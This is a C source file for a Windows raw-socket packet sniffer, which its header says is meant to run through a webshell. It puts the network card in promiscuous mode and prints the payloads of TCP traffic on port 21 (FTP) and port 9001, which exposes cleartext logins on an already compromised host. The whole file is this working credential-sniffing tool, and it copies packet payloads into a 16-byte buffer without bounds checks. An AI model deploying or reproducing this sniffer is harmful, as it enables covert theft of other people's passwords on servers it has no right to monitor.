/*------------------------------------------------------ *file: SnifferFtp.c *Effect: 用于在webshell进行嗅探实验之用,基于Raw *Code: Huai_Huai *Page: Http://hhuai.cn *Date: 2006.1.12 *-----------------------------------------------------*/ #include #include #include "Winsock2.h" #pragma comment(lib,"WS2_32.lib") #define SIO_RCVALL _WSAIOW(IOC_VENDOR,1) #define STATUS_FAILED 0xFFFF #define MAX_PACK_LEN 65535 #define MAX_ADDR_LEN 16 #define MAX_HOSTNAME_LEN 255 //定义ip报头 typedef struct _iphdr { byte ver_len; //版本4位,头长度4位,报头长度以32位为一个单位 byte type; //类型8位 byte length[2]; //总长度,16位,指出报文的以字节为单位的总长度 //报文长度不能超过65536个字接,否则认为报文遭到破坏 byte id[2]; //报文标示,用于多于一个报文16位 byte flag_offset[2];//标志,3位 数据块偏移13位 byte time; //生存时间,8位 byte protocol; //协议,8位 byte crc_val[2]; //头校验和,16位 byte src_addr[4]; //源地址,32位 byte tar_addr[4]; //目标地址,32位 byte options[4]; //选项和填充,32位 }IP_HEADER; typedef struct _tcphdr { byte source_port[2]; //发送端端口号,16位 byte dest_port[2]; //接收端端口号,16位 byte sequence_no[4]; //32位,标示消息端的数据位于全体数据块的某一字节的数字 byte ack_no[4]; //32位,确认号,标示接收端对于发送端接收到数据块数值 unsigned char offset_reser_con;//数据偏移4位,预留6位,控制位6为 unsigned char th_flag; byte window[2]; //窗口16位 byte checksum[2]; //校验码,16位 byte urgen_pointer[2]; //16位,紧急数据指针 byte options[3]; //选祥和填充,32位 }TCP_HEADER; #define PROTOCOL_ICMP 1 //传输控制协议 #define PROTOCOL_GTG 3 //Gateway-to-Gateway #define PROTOCOL_CGMM 4 //CMCC Gateway Monitoring Message #define PROTOCOL_ST 5 //ST #define PROTOCOL_TCP 6 //传输控制协议 #define PROTOCOL_UCL 7 //UCL #define PROTOCOL_SECURE 9 //secure #define PROTOCOL_BRM 10 //BBN RCC Monitoring #define PROTOCOL_NVP 11 //NVp #define PROTOCOL_PUP 12 //PUP #define PROTOCOL_PLURIBUS 13 //Pluribus #define PROTOCOL_TELENET 14 //Telenet #define PROTOCOL_XNET 15 //XNET #define PROTOCOL_CHAOS 16 //Chaos #define PROTOCOL_UDP 17 //UDP #define PROTOCOL_MULTIPLEXING 18 //Multiplexing #define PROTOCOL_DCN 19 //DCN #define PROTOCOL_TAC_MONITORING 20 //TAC Monitoring #define PROTOCOL_ALN 63 //any local network #define PROTOCOL_SATNET 64 //SATNET and Backroom EXPAK #define PROTOCOL_MITSS 65 //MIT Subnet Support #define PROTOCOL_SATNET_MONIT 69 //SATNET Monitoring #define PROTOCOL_IPCU 71 //Internet Packet Core Utility #define PROTOCOL_BK_SATNET_MONI 76 //Backroom SATNET Monitoring #define PROTOCOL_WIDEBAND_MONI 78 //WIDEBAND Monitoring #define PROTOCOL_WIDEBAND_EXPAK 79 //WIDEBAND EXPAK SOCKET SocketRaw; void startsniffer() { char RecvBuf[MAX_PACK_LEN]={0}; char FAR name[MAX_HOSTNAME_LEN]; WSADATA wsa; struct hostent FAR* pHostent; SOCKADDR_IN sa; DWORD OutBuffer[10]; DWORD InBuffer=1; DWORD BytesReturned=0;
if(WSAStartup(MAKEWORD(2,2),&wsa)!=0) { printf("不能加载Winsock DLL!"); exit(0); } SocketRaw=socket(AF_INET,SOCK_RAW,IPPROTO_IP); if(SocketRaw==INVALID_SOCKET) { printf("不能创建Socket!"); exit(0); }
gethostname(name,MAX_HOSTNAME_LEN);
//这里会自动分配内存 pHostent=gethostbyname(name);
sa.sin_family=AF_INET; sa.sin_port=htons(6000); memcpy(&sa.sin_addr.S_un.S_addr,pHostent->h_addr_list[0], pHostent->h_length); if(bind(SocketRaw,(PSOCKADDR)&sa,sizeof(sa))!=0) { printf("不能绑定网卡!"); closesocket(SocketRaw); exit(0); }
if(WSAIoctl(SocketRaw,SIO_RCVALL,&InBuffer,sizeof(InBuffer), &OutBuffer,sizeof(OutBuffer),&BytesReturned,NULL,NULL)!=0) { printf("不能创建WSAIoctl!"); closesocket(SocketRaw); exit(0); }
} int ReceiveBuf(byte* buf,int len) { return recv(SocketRaw,(char *)buf,len,0); } void main() { int len; byte RecvBuf[65535]; char buf[16]; int iphdr_len; TCP_HEADER* pTcpHeader; unsigned __int16 src_port; unsigned __int16 dest_port; int HdrLen; __int16 datalen; IP_HEADER* pIpheader; int port1,port2;
startsniffer(); while(TRUE) { port1=port2=0; memset(RecvBuf,0,65535); len=ReceiveBuf(RecvBuf,65535); if(len>0) { pIpheader=(IP_HEADER*)RecvBuf; /* switch(pIpheader->protocol) { case PROTOCOL_ICMP: printf("ICMP"); break; case PROTOCOL_TCP: printf("TCP"); break; case PROTOCOL_UDP: printf("UDP"); break; default: printf("其他协议"); break; } */ if(pIpheader->protocol==PROTOCOL_TCP) { iphdr_len=(pIpheader->ver_len&0xf)*4; pTcpHeader=(TCP_HEADER*)(RecvBuf+iphdr_len); src_port=pTcpHeader->source_port[0] *0x100+pTcpHeader->source_port[1]; dest_port=pTcpHeader->dest_port[0] *0x100+pTcpHeader->dest_port[1]; memset(buf,0,16); sprintf(buf,"%d",src_port); port1=src_port; //printf("%s ",buf); memset(buf,0,16); sprintf(buf,"%d",dest_port); port2=dest_port; //printf("%s ",buf); if(port1==21 || port2==21 || port1==9001 || port2==9001) { HdrLen=(pTcpHeader->offset_reser_con)>>2; memset(buf,0,16); sprintf(buf,"%s",((BYTE *)pTcpHeader)+HdrLen); //printf("%s ",buf); memset(buf,0,16); sprintf(buf,"%d.%d.%d.%d",pIpheader->src_addr[0], pIpheader->src_addr[1],pIpheader->src_addr[2], pIpheader->src_addr[3]); //printf("%s ",buf); memset(buf,0,16); sprintf(buf,"%d.%d.%d.%d",pIpheader->tar_addr[0], pIpheader->tar_addr[1],pIpheader->tar_addr[2], pIpheader->tar_addr[3]); //printf("%s ",buf); datalen=pIpheader->length[0] *0x100+pIpheader->length[1]; memset(buf,0,16); sprintf(buf,"%d",datalen); //printf("%s ",buf); HdrLen=(pTcpHeader->offset_reser_con)>>2; memset(buf,0,16); sprintf(buf,"%s",((BYTE *)pTcpHeader)+HdrLen); printf("%s",buf); //printf("\n"); } } } } } |